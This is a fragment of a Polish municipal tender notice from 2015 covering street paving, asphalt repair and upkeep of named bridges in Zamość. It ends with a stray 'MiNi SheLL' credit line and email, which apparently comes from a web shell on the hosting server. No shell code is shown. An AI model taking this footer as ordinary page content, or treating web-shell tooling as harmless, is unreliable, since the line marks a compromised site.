</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdg.zamosc.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Grodzkich w Zamościu 
22-400 Zamość , ul. Partyzantów 61.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2015 godzina 10:00, miejsce: Zarząd Dróg Grodzkich w Zamościu 
22-400 Zamość , ul. Partyzantów 61 
pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlane polegające na remoncie nawierzchni rozbieralnych ulic i chodników na terenie miasta Zamość w 2015 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części 1 są roboty budowlane polegające na remoncie nawierzchni rozbieralnych ulic i chodników na terenie miasta Zamość w 2015 r.
W ramach przedmiotu zamówienia są do wykonania niżej wymienione roboty budowlane remontu nawierzchni rozbieralnych ulic i chodników:
1)Wykonanie koryta gł. do 10cm w gruncie kat. III-IV,
2)Wykonanie koryta w gruncie kat. III-IV za każde dalsze 5cm głębokości,
3)W-wy odsączające zagęszczane mechanicznie, grubość w-wy po zagęszczeniu  do 10cm,
4)w-wy odsączające zagęszczane mechanicznie, za dalszy 1cm grubości w-wy,
5)Podsypka z piasku gr. 3cm,
6)Podsypka cem.- piaskowa gr. 3cm,
7)Wyrównanie zaniżeń nawierzchni materiałem kamiennym,
8)Wyrównanie zaniżeń nawierzchni materiałem kamiennym ( materiał zamawiającego),
9)Podbudowa z tłucznia z zagęszczeniem mechanicznym, 0/31,5mm, gr. w-wy do 10cm,
10)Podbudowa z tłucznia z zagęszczeniem mechanicznym, za każdy dalszy 1cm,
11) Ustawienie obrzeży betonowych 20x6 na podsypce cementowo- piaskowej,
12)Ustawienie krawężników betonowych 15x30 na podsypce cementowo-piaskowej ( krawężnik z rozbiórki),
13)Ustawienie krawężników betonowych 20x30 na podsypce cementowo-piaskowej ( krawężnik z rozbiórki),
14)Ustawienie krawężników betonowych 15x30 na podsypce cementowo-piaskowej,
15)Ustawienie krawężników betonowych 20x30 na podsypce cementowo-piaskowej,
16)Rozebranie krawężników betonowych 15x30 na podsypce piaskowej,
17)Rozebranie krawężników betonowych 20x30 na podsypce piaskowej,
18)Rozebranie obrzeży betonowych 20x6 na podsypce piaskowej,
19)Rozebranie nawierzchni z płyt betonowych 35x35x5,
20)Rozebranie nawierzchni z mieszanek min-bitum. gr.4cm,
21)Ławy pod krawężniki - ława betonowa z oporem,
22)Rozebranie podbudowy betonowej gr 15cm,
23)Rozebranie ław pod krawężniki z betonu,
24)Chodniki z kostki brukowej betonowej  gr. 6cm na podsypce cementowo-piaskowej,
25)Nawierzchnie  z kostki brukowej  gr. 8cm na podsypce cementowo-piask.,
26)Nawierzchnie z płyt drogowych betonowych pełnych o pow. 1 szt. płyty do 3m2,
27)Remont nawierzchni z płyt35x35x5 na podsypce cementowo-piaskowej,
28)Remont nawierzchni z klinkieru układanego na rąb na podsypce cementowo-piaskowej z   
wypełnieniem spoin piaskiem:
 - klinkier z rozbiórki
- klinkier nowy,
29) Remont nawierzchni z trylinki z wypełnieniem spoin piaskiem,
30) Regulacja pionowa studzienek dla urządzeń podziemnych, kratki ściekowe,
31) Transport materiałów z rozbiórki na odl. do 5km z załadunkiem i rozładunkiem,
 32) Mechaniczne profilowanie nawierzchni dróg gruntowych z zagęszczeniem w miarę   potrzeb,
33) Mechaniczne  ścinanie poboczy o gr. 25cm z odwiezieniem na odl. do 3km.
34) Rozebranie nawierzchni z klinkieru drogowego na podsypce piaskowej,
35) Wyrównanie istniejącej podbudowy stabilizacją cementowo- piaskową z zagęszczeniem mechanicznym-
36) Wywóz gruzu rozbiórki i dowóz klinkieru pojazdami samowyładowczymi odległość do 0,5km z załadunkiem
37) Dodatek do tabl. 1510 za transport na każde dalsze 0.5 km Krotność = 9,
38) Oczyszczenie klinkieru z rozbiórki do użytku,
39) Nawierzchnia z klinkieru drogowego układanego na rąb na podsypce nowej cementowo- 
            piaskowej, 

Szczegółowy zakres robót  określony został w  przedmiarze robót stanowiącym załącznik nr 8 - cz.nr1  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.23.11.19-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont nawierzchni bitumicznych masą na gorąco dróg na terenie miasta Zamość 2015r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie niżej wymienionych robót:
1.Frezowanie nawierzchni przy gr. 4cm z transportem do 5km na terenie miasta Zamość,
2.Remont cząstkowy nawierzchni betonem asfaltowym:
- z mechanicznym ramowaniem,
- z wykonaniem ramowania frezarką
- nakładki o pow. remontu ponad 100 m2

Szczegółowy zakres robót  określony został w  przedmiarze robót stanowiącym załącznik nr 8 cz. nr 2  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.23.11.19-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bieżące utrzymanie obiektów mostowych na terenie miasta Zamośc w 2015r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia są do wykonania niżej wymienione roboty bieżącego utrzymania . 
1.Obiekt mostowy ul. Męczenników Rotundy- (JNI 01024958).
Lokalne naprawy belki podporęczowej zaprawą typu PCC. 
Regulacja istniejących płyt ażurowych.
2. Obiekt mostowy ul. Okrzei (JNI 01024959).
Uzupełnienie mat. kamiennego między palisadą a obiektem.
3. Obiekt mostowy ul. Szczebrzeska (JNI - 01024960)
Uzupełnienie skarp pod obiektem(gruzem). 
Uzupełnienie ziemi pod obiektem.
4. Obiekt mostowy ul. Królowej Jadwigi (JNI 01024956).
Belka podporęczowa- skucie betonu, oczyszczenie. 
Belka podporęczowa- lokalne naprawy ubytków zaprawą PCC. 
Uzupełnienie gruntu pod obiektem.
Rozbiórka i ponowne ułożenie krat(ażury). Oczyszczenie nurtu rzeki.
5. Obiekt mostowy ul. Królowej Jadwigi (JNI 01024956).
Belka podporęczowa- lokalne naprawy ubytków zaprawą PCC. 
Czyszczenie powierzchni betonowych spodu pomostu z odtworzeniem powłoki betonowej.
6. Obiekt mostowy ul. Sienkiewicza (JNI 01024953).
Ścianki stalowe GZ  długości elementów 4 m. 
Ponowne ułożenie płyt ażurowych- istniejące płyty z koryta rzeki. 
Belka podporęczowa lokalne naprawy betonem PCC. 
Oczyszczenie nurtu rzeki. 
Uzupełnienie gruntu pod obiektem.
7. Obiekt mostowy ul. Królowej Jadwigi (JNI 01024955).
Belki podporęczowe - oczyścić powierzchnie zacieków, zabezpieczyć. 
Wymiana szczebli pionowych w poręczy.
8. Obiekt mostowy ul. Sadowa (JNI 01024950).
Oczyścić i zabezpieczyć antykorozyjnie blachy na oczepach. 
Naprawa poręczy. 
Oczyszczenie metodą strumieniowo- ścierną powierzchni pionowych ustroju nośnego i belki podporęczowej. 
Belka podporęczowa - lokalne naprawy betonem PCC. 
Zabezpieczenie antykorozyjne pow. betonowych belki podporęczowej i pow. pionowych ustroju nośnego.
9.Obiekt mostowy ul. Lipska (JNI 01024592).
Udrożnić wpusty na obiekcie. 
Naprawa chodników z nawierzchni epoksydowo - poliuretanowej. 
Konserwacja łożysk- oczyścić , zabezpieczyć antykorozyjnie. 
Dźwigary główne- oczyścić i zabezpieczyć (końcówki). 
Dźwigary główne, skrajne- oczyścić i zabezpieczyć.
10.Obiekt mostowy ul. Dzieci Zamojszczyzny przy ul. Okrzei (JNI 01024957)
Oczyszczenie koryta nurtu rzeki. 
Założenie blach dylatacyjnych (2,5x0,2m) z oczyszczenie dylatacji z zanieczyszczeń. 
Belka podporęczowa, skrzydełka - lokalne naprawy betonem PCC.
11.Obiekt mostowy ul. Al. 1-go Maja  (JNI 01024954).
Uszczelnienie dylatacji na belce podporęczowej materiałem elastycznym (0,6x4). 
Oczyszczenie i zabezpieczenie antykorozyjne kotew z uzupełnieniem nakładek zabezpieczających. 
Wymiana uszkodzonej bariery SP-06.
12. Obiekt mostowy ul. Dzieci Zamojszczyzny strona lewa (JNI 01024949).
Przecięcie i wykucie dylatacji pionowej pomiędzy ustrojem nośnym a przyczółkiem. 
Wykonanie iniekcji rys przyczółka(4x0,7).
13. Obiekt mostowy ul. Dzieci Zamojszczyzny strona prawa (JNI 01024948).
Przecięcie i wykucie dylatacji pionowej pomiędzy ustrojem nośnym a przyczółkiem.
Wykonanie iniekcji rys przyczółka(4x0,65). 
Gzyms str. południowa - skucie betonu uzupełnienie zbrojenia i odbudowanie.
14. Wiadukt w ciągu ul. Wyszyńskiego (JNI 01024947).
Oczyścić powierzchnie przyczółków z zacieków i graffiti na wys. do 6m.
15. Kładka dla pieszych na ulicy Zamoyskiego ( JNI  31000342).
Oczyszczenie i zabezpieczenie antykorozyjne.
Szczegółowy zakres robot opisany jest w przedmiarze robót stanowiącym załącznik nr 8 cz. nr 3  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.23.11.19-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com